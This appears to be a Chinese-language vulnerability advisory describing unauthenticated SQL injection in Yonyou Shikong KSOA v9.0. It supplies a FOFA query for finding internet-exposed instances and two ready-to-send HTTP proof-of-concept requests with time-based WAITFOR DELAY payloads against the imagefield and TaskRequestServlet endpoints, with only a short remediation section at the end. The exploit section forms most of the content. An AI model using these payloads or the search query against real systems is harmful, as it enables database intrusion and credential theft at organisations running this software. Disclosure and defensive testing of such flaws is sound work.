0x01 產品簡介

? ?用友時空KSOA是建立在SOA理念指導下研發的新一代產品，是根據流通企業最前沿的I需求推出的統一的IT基礎架構，它可以讓流通企業各個時期建立的IT系統之間彼此輕松對話，幫助流通企業保護原有的IT投資，簡化IT管理，提升競爭能力，確保企業整體的戰略目標以及創新活動的實現。?

0x02 漏洞概述

? ?用友時空KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口處存在sql注入漏洞，未經身份認證的攻擊者可通過該漏洞獲取數據庫敏感信息及憑證，最終可能導致服務器失陷。

0x03 影響范圍

用友時空 KSOA v9.0

0x04 復現環境

FOFA：app="用友-時空KSOA"

?0x05 漏洞復現

PoC-1

GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1%27;WAITFOR%20DELAY%20%270:0:10%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Encoding: gzip, deflate
Connection: close

構造注入延時10秒??

?sqlmap驗證

PoC-2

GET /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet?unitid=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Encoding: gzip, deflate
Connection: close

?sqlmap驗證

?0x06 修復建議

臨時緩解方案

限制訪問來源地址，如非必要，不要將系統開放在互聯網上。

升級修復方案

升級至安全版本或打補丁。

?

?

?

?